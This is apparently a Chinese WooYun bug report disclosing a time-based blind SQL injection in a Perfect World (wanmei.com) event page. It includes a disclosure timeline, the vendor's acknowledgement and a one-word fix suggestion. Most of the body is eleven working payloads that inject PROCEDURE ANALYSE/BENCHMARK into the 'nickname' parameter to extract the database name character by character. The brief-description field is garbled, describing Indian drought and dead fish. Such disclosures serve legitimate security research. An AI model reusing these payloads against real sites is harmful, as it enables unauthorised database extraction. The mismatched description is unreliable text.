漏洞详情披露状态: 2016-04-26: 细节已通知厂商并且等待厂商处理中2016-04-26: 厂商已经确认,细节仅向厂商公开2016-05-06: 细节向核心白帽子及相关领域专家公开2016-05-16: 细节向普通白帽子公开2016-05-26: 细节向实习白帽子公开2016-06-10: 细节向公众公开简要描述:印度高温导致干旱,河塘干涸死鱼遍地详细说明:http://event8.wanmei.com/zhuxian/zxdiamondlove/zxzuanshi!list.actiondata: nickname=77&title=88延时不延时 漏洞证明:code 区域database(): 'huodong2547'
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(1)for(1)))=104,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(2)for(1)))=117,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(3)for(1)))=111,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(4)for(1)))=100,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(5)for(1)))=111,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(6)for(1)))=110,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(7)for(1)))=103,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(8)for(1)))=50,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(9)for(1)))=53,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(10)for(1)))=52,13000000),md5(1)))),1)%23&title=88
nickname=77' PROCEDURE analyse((extractvalue(1,BENCHMARK(elt(ascii(mid(database()from(11)for(1)))=55,13000000),md5(1)))),1)%23&title=88 修复方案:过滤版权声明:转载请注明来源 路人甲@乌云漏洞回应厂商回应:危害等级:高漏洞Rank:10确认时间:2016-04-26 11:42厂商回复:感谢洞主对完美世界的关注,我们将尽快修补。最新状态:暂无
